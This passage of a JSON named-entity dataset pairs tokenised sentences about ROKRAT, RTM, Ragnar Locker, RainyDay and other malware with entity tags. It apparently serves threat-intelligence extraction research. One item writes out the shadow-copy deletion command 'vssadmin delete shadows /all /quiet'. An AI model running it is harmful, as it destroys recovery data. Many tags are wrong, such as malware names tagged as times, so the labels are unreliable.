"O", "B-Features", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "ROCKBOOT", "is", "a", "Master", "Boot", "Record", "(MBR)", "bootkit", "that", "uses", "the", "MBR", "to", "establish", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "ROKRAT", "can", "use", "the", "`GetForegroundWindow`", "and", "`GetWindowText`", "APIs", "to", "discover", "where", "the", "user", "is", "typing." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ROKRAT", "has", "an", "audio", "capture", "and", "eavesdropping", "module." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "ROKRAT", "has", "used", "legitimate", "social", "networking", "sites", "and", "cloud", "platforms", "(including", "but", "not", "limited", "to", "Twitter,", "Yandex,", "Dropbox,", "and", "Mediafire)", "for", "C2", "communications." ], "ner_tags": [ "B-Way", "O", "O", "O", "I-Idus", "I-Idus", "I-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Org", "B-Way", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "ROKRAT", "can", "extract", "clipboard", "data", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "ROKRAT", "can", "steal", "credentials", "stored", "in", "Web", "browsers", "by", "querying", "the", "sqlite", "database." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ROKRAT", "can", "collect", "host", "data", "and", "specific", "file", "types." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "B-Features", "O", "O" ] }, { "tokens": [ "ROKRAT", "can", "check", "for", "debugging", "tools." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ROKRAT", "can", "decrypt", "strings", "using", "the", "victim's", "hostname", "as", "the", "key." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ROKRAT", "relies", "on", "a", "specific", "victim", "hostname", "to", "execute", "and", "decrypt", "important", "strings." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O" ] }, { "tokens": [ "ROKRAT", "can", "send", "collected", "files", "back", "over", "same", "C2", "channel." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ROKRAT", "can", "send", "collected", "data", "to", "cloud", "storage", "services", "such", "as", "PCloud." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "ROKRAT", "can", "request", "to", "delete", "files." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "B-Features" ] }, { "tokens": [ "ROKRAT", "has", "the", "ability", "to", "gather", "a", "list", "of", "files", "and", "directories", "on", "the", "infected", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ROKRAT", "can", "retrieve", "additional", "malicious", "payloads", "from", "its", "C2", "server." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ROKRAT", "can", "use", "`SetWindowsHookEx`", "and", "`GetKeyNameText`", "to", "capture", "keystrokes." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O", "O", "B-Features", "B-Purp" ] }, { "tokens": [ "ROKRAT", "has", "relied", "upon", "users", "clicking", "on", "a", "malicious", "attachment", "delivered", "through", "spearphishing." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "ROKRAT", "can", "modify", "the", "`HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\`", "registry", "key", "so", "it", "can", "bypass", "the", "VB", "object", "model", "(VBOM)", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "ROKRAT", "can", "use", "a", "variety", "of", "API", "calls", "to", "execute", "shellcode." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Tool", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ROKRAT", "can", "encrypt", "data", "prior", "to", "exfiltration", "by", "using", "an", "RSA", "public", "key." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Tool" ] }, { "tokens": [ "ROKRAT", "can", "list", "the", "current", "running", "processes", "on", "the", "system." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ROKRAT", "can", "use", "`VirtualAlloc`,", "`WriteProcessMemory`,", "and", "then", "`CreateRemoteThread`", "to", "execute", "shellcode", "within", "the", "address", "space", "of", "`Notepad.exe`." ], "ner_tags": [ "B-SamFile", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ROKRAT", "can", "access", "the", "<code>HKLM\\System\\CurrentControlSet\\Services\\mssmbios\\Data\\SMBiosData</code>", "Registry", "key", "to", "obtain", "the", "System", "manufacturer", "value", "to", "identify", "the", "machine", "type." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ROKRAT", "can", "capture", "screenshots", "of", "the", "infected", "system", "using", "the", "`gdi32`", "library." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ROKRAT", "has", "been", "delivered", "via", "spearphishing", "emails", "that", "contain", "a", "malicious", "Hangul", "Office", "or", "Microsoft", "Word", "document." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "I-SamFile", "I-SamFile", "O" ] }, { "tokens": [ "ROKRAT", "can", "check", "for", "VMware-related", "files", "and", "DLLs", "related", "to", "sandboxes." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ROKRAT", "can", "gather", "the", "hostname", "and", "the", "OS", "version", "to", "ensure", "it", "doesn’t", "run", "on", "a", "Windows", "XP", "or", "Windows", "Server", "2003", "systems." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ROKRAT", "can", "collect", "the", "username", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ROKRAT", "has", "used", "Visual", "Basic", "for", "execution." ], "ner_tags": [ "B-SamFile", "O", "O", "I-Tool", "I-Tool", "O", "O" ] }, { "tokens": [ "ROKRAT", "can", "use", "HTTP", "and", "HTTPS", "for", "command", "and", "control", "communication." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ROKRAT", "can", "steal", "credentials", "by", "leveraging", "the", "Windows", "Vault", "mechanism." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "RTM", "monitors", "browsing", "activity", "and", "automatically", "captures", "screenshots", "if", "a", "victim", "browses", "to", "a", "URL", "matching", "one", "of", "a", "list", "of", "strings." ], "ner_tags": [ "B-SamFile", "O", "B-Org", "B-OffAct", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RTM", "can", "attempt", "to", "run", "the", "program", "as", "admin,", "then", "show", "a", "fake", "error", "message", "and", "a", "legitimate", "UAC", "bypass", "prompt", "to", "the", "user", "in", "an", "attempt", "to", "socially", "engineer", "the", "user", "into", "escalating", "privileges." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "RTM", "has", "the", "ability", "to", "remove", "Registry", "entries", "that", "it", "created", "for", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RTM", "collects", "data", "from", "the", "clipboard." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "RTM", "samples", "have", "been", "signed", "with", "a", "code-signing", "certificates." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RTM", "has", "used", "an", "RSS", "feed", "on", "Livejournal", "to", "update", "a", "list", "of", "encrypted", "C2", "server", "names.", "RTM", "has", "also", "hidden", "Pony", "C2", "server", "IP", "addresses", "within", "transactions", "on", "the", "Bitcoin", "and", "Namecoin", "blockchain." ], "ner_tags": [ "B-Time", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Time", "O", "O", "O", "B-Tool", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RTM", "can", "search", "for", "specific", "strings", "within", "browser", "tabs", "using", "a", "Dynamic", "Data", "Exchange", "mechanism." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RTM", "has", "resolved", "Pony", "C2", "server", "IP", "addresses", "by", "either", "converting", "Bitcoin", "blockchain", "transaction", "data", "to", "specific", "octets,", "or", "accessing", "IP", "addresses", "directly", "within", "the", "Namecoin", "blockchain." ], "ner_tags": [ "B-Time", "O", "O", "B-HackOrg", "B-OffAct", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "RTM", "can", "delete", "all", "files", "created", "during", "its", "execution." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RTM", "can", "check", "for", "specific", "files", "and", "directories", "associated", "with", "virtualization", "and", "malware", "analysis." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RTM", "can", "download", "additional", "files." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "RTM", "can", "add", "a", "certificate", "to", "the", "Windows", "store." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "RTM", "can", "record", "keystrokes", "from", "both", "the", "keyboard", "and", "virtual", "keyboard." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RTM", "has", "relied", "on", "users", "opening", "malicious", "email", "attachments,", "decompressing", "the", "attached", "archive,", "and", "double-clicking", "the", "executable", "within." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "I-Way", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "RTM", "has", "named", "the", "scheduled", "task", "it", "creates", "\"Windows", "Update\"." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RTM", "has", "been", "delivered", "as", "archived", "Windows", "executable", "files", "masquerading", "as", "PDF", "documents." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "RTM", "can", "delete", "all", "Registry", "entries", "created", "during", "its", "execution." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RTM", "can", "use", "the", "<code>FindNextUrlCacheEntryA</code>", "and", "<code>FindFirstUrlCacheEntryA</code>", "functions", "to", "search", "for", "specific", "strings", "within", "browser", "history." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RTM", "used", "Port", "44443", "for", "its", "VNC", "module." ], "ner_tags": [ "B-Org", "O", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RTM", "strings,", "network", "data,", "configuration,", "and", "modules", "are", "encrypted", "with", "a", "modified", "RC4", "algorithm.", "RTM", "has", "also", "been", "delivered", "to", "targets", "as", "various", "archive", "files", "including", "ZIP,", "7-ZIP,", "and", "RAR." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "B-Way", "O", "B-Way" ] }, { "tokens": [ "RTM", "can", "obtain", "a", "list", "of", "smart", "card", "readers", "attached", "to", "the", "victim." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RTM", "can", "obtain", "information", "about", "process", "integrity", "levels." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "RTM", "tries", "to", "add", "a", "Registry", "Run", "key", "under", "the", "name", "\"Windows", "Update\"", "to", "establish", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RTM", "has", "the", "capability", "to", "download", "a", "VNC", "module", "from", "command", "and", "control", "(C2)." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "B-Way", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RTM", "runs", "its", "core", "DLL", "file", "using", "rundll32.exe." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "RTM", "tries", "to", "add", "a", "scheduled", "task", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RTM", "can", "capture", "screenshots." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "RTM", "can", "obtain", "information", "about", "security", "software", "on", "the", "victim." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RTM", "can", "scan", "victim", "drives", "to", "look", "for", "specific", "banking", "software", "on", "the", "machine", "to", "determine", "next", "actions." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RTM", "has", "been", "delivered", "via", "spearphishing", "attachments", "disguised", "as", "PDF", "documents." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RTM", "encrypts", "C2", "traffic", "with", "a", "custom", "RC4", "variant." ], "ner_tags": [ "B-Way", "O", "B-HackOrg", "B-Features", "O", "O", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "RTM", "can", "obtain", "the", "computer", "name,", "OS", "version,", "and", "default", "language", "identifier." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RTM", "can", "obtain", "the", "victim", "username", "and", "permissions." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RTM", "can", "obtain", "the", "victim", "time", "zone." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RTM", "can", "detect", "if", "it", "is", "running", "within", "a", "sandbox", "or", "other", "virtualized", "analysis", "environment." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RTM", "has", "initiated", "connections", "to", "external", "domains", "using", "HTTPS." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "RTM", "uses", "the", "command", "line", "and", "rundll32.exe", "to", "execute." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "Ragnar", "Locker", "encrypts", "files", "on", "the", "local", "machine", "and", "mapped", "drives", "prior", "to", "displaying", "a", "note", "demanding", "a", "ransom." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ragnar", "Locker", "has", "attempted", "to", "terminate/stop", "processes", "and", "services", "associated", "with", "endpoint", "security", "products." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ragnar", "Locker", "can", "delete", "volume", "shadow", "copies", "using", "<code>vssadmin", "delete", "shadows", "/all", "/quiet</code>." ], "ner_tags": [ "B-SamFile", "B-HackOrg", "O", "B-Features", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Ragnar", "Locker", "has", "been", "delivered", "as", "an", "unsigned", "MSI", "package", "that", "was", "executed", "with", "<code>msiexec.exe</code>." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Ragnar", "Locker", "may", "attempt", "to", "connect", "to", "removable", "drives", "and", "mapped", "network", "drives." ], "ner_tags": [ "B-SamFile", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Ragnar", "Locker", "has", "used", "regsvr32.exe", "to", "execute", "components", "of", "VirtualBox." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ragnar", "Locker", "has", "used", "VirtualBox", "and", "a", "stripped", "Windows", "XP", "virtual", "machine", "to", "run", "itself.", "The", "use", "of", "a", "shared", "folder", "specified", "in", "the", "configuration", "enables", "Ragnar", "Locker", "to", "encrypt", "files", "on", "the", "host", "operating", "system,", "including", "files", "on", "any", "mapped", "drives." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "I-Tool", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ragnar", "Locker", "has", "used", "rundll32.exe", "to", "execute", "components", "of", "VirtualBox." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ragnar", "Locker", "has", "used", "sc.exe", "to", "execute", "a", "service", "that", "it", "creates." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ragnar", "Locker", "has", "attempted", "to", "stop", "services", "associated", "with", "business", "applications", "and", "databases", "to", "release", "the", "lock", "on", "files", "used", "by", "these", "applications", "so", "they", "may", "be", "encrypted." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Before", "executing", "malicious", "code,", "Ragnar", "Locker", "checks", "the", "Windows", "API", "<code>GetLocaleInfoW</code>", "and", "doesn't", "encrypt", "files", "if", "it", "finds", "a", "former", "Soviet", "country." ], "ner_tags": [ "O", "O", "O", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Area", "I-Area", "O" ] }, { "tokens": [ "Ragnar", "Locker", "has", "used", "cmd.exe", "and", "batch", "scripts", "to", "execute", "commands." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-SamFile", "O", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "Ragnar", "Locker", "has", "used", "sc.exe", "to", "create", "a", "new", "service", "for", "the", "VirtualBox", "driver." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Raindrop", "decrypted", "its", "Cobalt", "Strike", "payload", "using", "an", "AES-256", "encryption", "algorithm", "in", "CBC", "mode", "with", "a", "unique", "key", "per", "sample." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Raindrop", "encrypted", "its", "payload", "using", "a", "simple", "XOR", "algorithm", "with", "a", "single-byte", "key." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Raindrop", "was", "built", "to", "include", "a", "modified", "version", "of", "7-Zip", "source", "code", "(including", "associated", "export", "names)", "and", "Far", "Manager", "source", "code." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "Raindrop", "was", "installed", "under", "names", "that", "resembled", "legitimate", "Windows", "file", "and", "directory", "names." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Raindrop", "used", "a", "custom", "packer", "for", "its", "Cobalt", "Strike", "payload,", "which", "was", "compressed", "using", "the", "LZMA", "algorithm." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Raindrop", "used", "steganography", "to", "locate", "the", "start", "of", "its", "encoded", "payload", "within", "legitimate", "7-Zip", "code." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "After", "initial", "installation,", "Raindrop", "runs", "a", "computation", "to", "delay", "execution." ], "ner_tags": [ "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RainyDay", "can", "use", "tools", "to", "collect", "credentials", "from", "web", "browsers." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "RainyDay", "can", "use", "side-loading", "to", "run", "malicious", "executables." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "B-HackOrg", "B-HackOrg" ] }, { "tokens": [ "RainyDay", "can", "use", "a", "file", "exfiltration", "tool", "to", "collect", "recently", "changed", "files", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RainyDay", "can", "decrypt", "its", "payload", "via", "a", "XOR", "key." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RainyDay", "has", "downloaded", "as", "a", "XOR-encrypted", "payload." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RainyDay", "can", "use", "a", "file", "exfiltration", "tool", "to", "upload", "specific", "files", "to", "Dropbox." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Features", "I-Features", "I-Features", "O", "B-Way" ] }, { "tokens": [ "RainyDay", "has", "the", "ability", "to", "switch", "between", "TCP", "and", "HTTP", "for", "C2", "if", "one", "method", "is", "not", "working." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RainyDay", "has", "the", "ability", "to", "uninstall", "itself", "by", "deleting", "its", "service", "and", "files." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "RainyDay", "can", "use", "a", "file", "exfiltration", "tool", "to", "collect", "recently", "changed", "files", "with", "specific", "extensions." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RainyDay", "can", "download", "files", "to", "a", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "RainyDay", "can", "use", "a", "file", "exfiltration", "tool", "to", "copy", "files", "to", "<code>C:\\ProgramData\\Adobe\\temp</code>", "prior", "to", "exfiltration." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RainyDay", "has", "named", "services", "and", "scheduled", "tasks", "to", "appear", "benign", "including", "\"ChromeCheck\"", "and", "\"googleupdate.\"" ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "RainyDay", "has", "used", "names", "to", "mimic", "legitimate", "software", "including", "\"vmtoolsd.exe\"", "to", "spoof", "Vmtools." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "B-Way" ] }, { "tokens": [ "The", "file", "collection", "tool", "used", "by", "RainyDay", "can", "utilize", "native", "API", "including", "<code>ReadDirectoryChangeW</code>", "for", "folder", "monitoring." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RainyDay", "can", "use", "TCP", "in", "C2", "communications." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "RainyDay", "can", "enumerate", "processes", "on", "a", "target", "system." ], "ner_tags": [ "B-Way", "O", "B-Features", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "RainyDay", "can", "use", "proxy", "tools", "including", "boost_proxy_client", "for", "reverse", "proxy", "functionality." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "RainyDay", "can", "use", "scheduled", "tasks", "to", "achieve", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "RainyDay", "has", "the", "ability", "to", "capture", "screenshots." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "RainyDay", "can", "use", "RC4", "to", "encrypt", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RainyDay", "can", "create", "and", "register", "a", "service", "for", "execution." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "I-Features", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "RainyDay", "can", "use", "HTTP", "in", "C2", "communications." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "RainyDay", "can", "use", "the", "Windows", "Command", "Shell", "for", "execution." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Tool", "O", "B-Tool", "O", "O" ] }, { "tokens": [ "RainyDay", "can", "use", "the", "QuarksPwDump", "tool", "to", "obtain", "local", "passwords", "and", "domain", "cached", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "RainyDay", "can", "use", "services", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Ramsay", "can", "insert", "itself", "into", "the", "address", "space", "of", "other", "applications", "using", "the", "AppInit", "DLL", "Registry", "key." ], "ner_tags": [ "B-Tool", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O" ] }, { "tokens": [ "Ramsay", "can", "store", "collected", "documents", "in", "a", "custom", "container", "after", "encrypting", "and", "compressing", "them", "using", "RC4", "and", "WinRAR." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Ramsay", "can", "compress", "and", "archive", 